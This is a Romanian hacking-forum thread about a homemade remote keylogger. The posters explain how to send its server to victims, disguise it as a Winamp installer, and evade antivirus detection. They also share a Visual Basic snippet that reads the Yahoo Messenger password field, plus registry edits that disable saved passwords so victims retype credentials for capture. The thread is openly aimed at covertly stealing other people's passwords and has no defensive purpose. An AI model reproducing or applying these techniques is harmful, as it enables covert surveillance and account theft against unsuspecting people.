Jump to content
Nytro

Digital Keylogger by Nytro

Recommended Posts

Posted

Un Keylogger foarte usor de folosit . Trimiti server victimei , intri in client , scri la Victim IP ip-ul victimei si dai Connect . E necesar ca vitima sa execute server si ca IP sa fie corect . Si daca Status este : Connected functioneaza . Ca sa incepi keyloggingul apesi Start Keylogging . O sa iti apara in client tot ce scrie victima . Si ai optiunea Close Y! Messenger . Click pe buton si o sa-i inchizi messu . Victima repede o sa intre pe mess ca nu poate sta 5 min fara mess ... si i-ai luat parola de la mess :)

Screenshot :

screenshothh8.jpg

Latest version :

Digital Keylogger v3.o

http://rstcenter.com/forum/digital-keylogger-v3-0-by-nytro-t9876.rst

Enjoy ;)

Guest Nemessis
Posted

Dragut. Nedetectabil cu Norton 2005. Sa vedem ce zic cei ce il testeaza si daca e gasit de vreun AV :)

Posted

Imi place pt ca este simplu si poate sa il foloseasca oricine.

L-am trimis unui amic care foloseste BitDefender(nu stiu ce versiune) si nu l-a gasit ca virus.

Acum sa vedem cat timp se mentine FUD...

Good job yonyx :P

Posted

programul merge lam testat pe 2 persoane si a mers ...

Poate nu a mers din cauza :

-nu e bun IP

-victima nu a rulat server

-server a fost blocat de firewall

MS all ... o sa incep lucrul la Digital Keylogger Pro si o sal imbunatatesc putin ... incerc sa fac sa se conecteze automat la client , la rularea serverului ... da asta cred ca va merge decat pe un ip ...

Nu o sa dau sursa da o sa va spun cate ceva despre cum functioneaza ...

In server se afla un label care "retine" toate tastele apasate ... si la apasarea din client pe "Start ..." serverul trimite din secunda in secunda catre client acel label ... Daca puneam mai putin , mergea calc victimei greu ... Cam asta e baza ...

Nu-l scanati pe virustotal pls

Posted

yonyx e tar ekeylogger-ul l-am scanat cu nod 32 shi nik, o intrebare merge sa-l bindez cu o mel k shtiu k dak bindam unele keyloggere numai mergeau?????

Posted

nu-l mai binda...trimite la victima spunandu-i ca e Y!amp9.0 la mn a mers de trimis dar nu a functionat..probabil au firewall oricum asteptam versiunea pro:) nytro

Posted

Banuiesc ca este nedetectabil pentru ca nu ai scris functia de adaugare a programului la StartUp (scriere in registrii, care este detectata de majoritatea antivirusilor). Pe langa asta, sper ca ti-ai dat seama ca faza cu "Close Y! M" nu este prea utila, pentru ca majoritatea oamenilor au optiunea Remember my ID & Password activata... Eee, bun ! Sa iti spun cum ai putea sa faci sa "capturezi" cumva parola aceea, chiar daca are optiunea aia activata. Ori scrii un DLL care il injectezi in procesul Yahoo! Messengerului, ori injectezi direct cod. Ce cod ? Un cod care subclaseaza butonul &Sign In (pentru asta ii gasesti handleul cu FindWindow si FindWindowEx) si verifica daca primeste mesaje de gen: WM_COMMAND (din cate stiu eu, trimiterea acestui mesaj are loc cand este apasat respectivul buton). Folosind functia WindowProc (CallBack), daca parametrul uMsg este WM_COMMAND, atunci gasesti handleul TextBoxului in care se introduce parola si preiei acest text folosind APIul GetWindowText (tine minte, al 2-lea parametru este un buffer). Apoi trimiti mesajul inapoi la buton folosind CallWindowProc :-).

Sper ca am fost destul de explicit (thnx lui Shocker pentru explicarea unor nelamuriri).

In rest, este un keylogger ca oricare altul. Oricum, good job !

Posted
Banuiesc ca este nedetectabil pentru ca nu ai scris functia de adaugare a programului la StartUp (scriere in registrii, care este detectata de majoritatea antivirusilor). Pe langa asta, sper ca ti-ai dat seama ca faza cu "Close Y! M" nu este prea utila, pentru ca majoritatea oamenilor au optiunea Remember my ID & Password activata... Eee, bun ! Sa iti spun cum ai putea sa faci sa "capturezi" cumva parola aceea, chiar daca are optiunea aia activata. Ori scrii un DLL care il injectezi in procesul Yahoo! Messengerului, ori injectezi direct cod. Ce cod ? Un cod care subclaseaza butonul &Sign In (pentru asta ii gasesti handleul cu FindWindow si FindWindowEx) si verifica daca primeste mesaje de gen: WM_COMMAND (din cate stiu eu, trimiterea acestui mesaj are loc cand este apasat respectivul buton). Folosind functia WindowProc (CallBack), daca parametrul uMsg este WM_COMMAND, atunci gasesti handleul TextBoxului in care se introduce parola si preiei acest text folosind APIul GetWindowText (tine minte, al 2-lea parametru este un buffer). Apoi trimiti mesajul inapoi la buton folosind CallWindowProc :-).

Sper ca am fost destul de explicit (thnx lui Shocker pentru explicarea unor nelamuriri).

In rest, este un keylogger ca oricare altul. Oricum, good job !

are functia de adaugare la startup!

Posted

se adauga la start up . da antivirusii gaseau ca virus : Filecopy AppPath ... codu de copiere al fisierului in system32 ... yo am facut o arhiva SFX in care am pus si mswinsck si care copiaza server si mswinsck in system32 si ruleaza dupa copiere serverul . Si cu close yahoo messenger ... nu cred ca am scris bne comanda :D si nush daca inchide messu DAR : cred ca merge : o sa ii inchida messu : victima intra pe mess si scrie id si parola si normal idu si parola le "prinde" keyloggerul si le trimite in client , deci o sa primesti pe tava parola foarte simplu :)

Posted

Ok. Ca sa inchizi Y! M folosesti:


din hwnd as long
hwnd=FindWindow("YahooBuddyMain", vbnullstring)

Apoi trimiti la hwnd un mesaj, si anume WM_CLOSE, folosind APIul PostMessage sau SendMessage.

Cat despre parola/id la messenger, ai citit ce am scris mai sus ?

Posted

merge optiunea close messenger pe care am puso yo ... si ce ai explicat tu ... nu prea re rost sa ma complic ... si dc "YahooBuddyMain" ? dc nu Yahoo! Messenger ? si daca ii inchid messu , victima o sa intre imediat pe mess , o sa scrie id-ul si parola si o sa le primesc in keylogger . foarte simplu ...

Posted

YahooBuddyMain pentru ca asta este clasa ferestrei messengerului !

Si nu cred ca te complici, pentru ca majoritatea au optiunea Remember my ID & Password activata, si tu nu mai ai ce parola sa capturezi pt. ca el nu o scrie ! Greu e de inteles !

Guest Nemessis
Posted
vladiii avansezi. Bravo. Tine-o tot asa.

Hmm... Esti ironic ? :lol:

nope

Posted

pai as putea sa etez erverul sa "captureze" doar textele scrise pe messenger ... cu FindWindow ... iar de optiunea cu remember id and password scap usor cu o modificare in registry :)

Posted

Cum sa preiei parola din textbox (thnx SlicK pentru ajutor):


Dim a as long, b as long, c as long, d as long
Dim pass as string
pass=Space$(256)
a=FindWindow("YahooBuddyMain",vbnullstring)
b=FindWindowEx(a, vbnullstring, "#32770", vbnullstring)
c=FindWindowEx(b, vbnullstring, "Edit", vbnullstring)
d=FindWindowEx(b, c, "Edit", vbnullstring)
GetWindowText d,pass,256

Si in legatura cu ce ai spus sus, astept cod ca-s curios.

Posted

pai cod ca sa "captureze" doar ce e scris pe messenger cu FindWindow , daca returneaza o valoare nula nu pornesc keylogger ( in cazul digital keylogger , folosesc un timer , deci daca returneaza o valoare nula nu dau enable la timer si porneste keylogger . iar daca nu returneaza o valoare nula , nu dau enable la timer , deci keyloggerul nu e pornit ... ca sa zic asa

iar cu remember id and password e foarte usor :

Curent user / software / yahoo / pager / save password : 0 ca sa nu fie remember , si 1 ca sa fie remember :)

Curent user / software / yahoo / pager / auto login : 0 ca sa nu se logheze automat , si 1 ca sa e logheze automat :) ( adika la 0 apesi enter ca sa te loghezi )

Curent user / software / yahoo / pager / yahoo! user id >> idul care se logheaza automat

Curent user / software / yahoo / pager / launch on startup >> daca e logheaza automat la startup

Guest
This topic is now closed to further replies.


×
×
  • Create New...